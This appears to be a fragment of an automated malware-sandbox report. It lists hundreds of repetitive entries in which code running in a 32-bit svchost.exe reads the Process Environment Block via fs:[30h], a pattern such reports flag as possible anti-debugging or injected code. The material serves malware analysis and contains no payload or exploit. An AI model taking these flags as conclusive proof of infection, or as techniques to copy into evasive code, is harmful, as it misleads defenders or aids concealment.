Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]	2_2_037C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]	2_2_03760124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]	2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]	2_2_038061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]	2_2_037F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]	2_2_037DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]	2_2_037601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_037AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]	2_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]	2_2_037F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]	2_2_037B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]	2_2_0372A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]	2_2_03770185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]	2_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]	2_2_037EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]	2_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]	2_2_037D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]	2_2_0375C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]	2_2_03732050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]	2_2_037B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]	2_2_037C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]	2_2_0372A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]	2_2_0372C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]	2_2_0374E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]	2_2_037B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]	2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0372C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]	2_2_037720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0372A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]	2_2_037380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]	2_2_037B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]	2_2_037B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]	2_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_037F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]	2_2_037C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]	2_2_0373208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]	2_2_03738770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]	2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]	2_2_03730750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]	2_2_037BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]	2_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]	2_2_03772750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]	2_2_037B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]	2_2_0376674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]	2_2_0376273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]	2_2_037AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]	2_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]	2_2_0376C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]	2_2_03730710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]	2_2_03760710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]	2_2_0376C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]	2_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]	2_2_037347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]	2_2_037527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_037BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]	2_2_037B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]	2_2_037307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]	2_2_037D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]	2_2_03762674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]	2_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]	2_2_037F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]	2_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]	2_2_0376A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]	2_2_0374C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]	2_2_0374E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]	2_2_03766620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]	2_2_03768620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]	2_2_0373262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]	2_2_03772619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]	2_2_037AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]	2_2_0374260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_037AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]	2_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]	2_2_037B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0376A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]	2_2_037666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0376C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]	2_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]	2_2_03734690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]	2_2_0376656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]	2_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]	2_2_03738550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]	2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]	2_2_0375E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]	2_2_037C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]	2_2_03804500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0375E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]	2_2_037325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]	2_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]	2_2_0376C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]	2_2_037365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0376A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]	2_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]	2_2_0376E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]	2_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]	2_2_037545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]	2_2_037B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]	2_2_0376E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]	2_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]	2_2_03732582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]	2_2_03764588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]	2_2_0375A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]	2_2_037BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]	2_2_0372645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]	2_2_0375245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]	2_2_0376E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]	2_2_0376A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]	2_2_0372E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]	2_2_0372C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]	2_2_037B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]	2_2_03768402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]	2_2_037304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]	2_2_037644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_037BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]	2_2_037364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]	2_2_0372CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]	2_2_037DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]	2_2_037C6B40
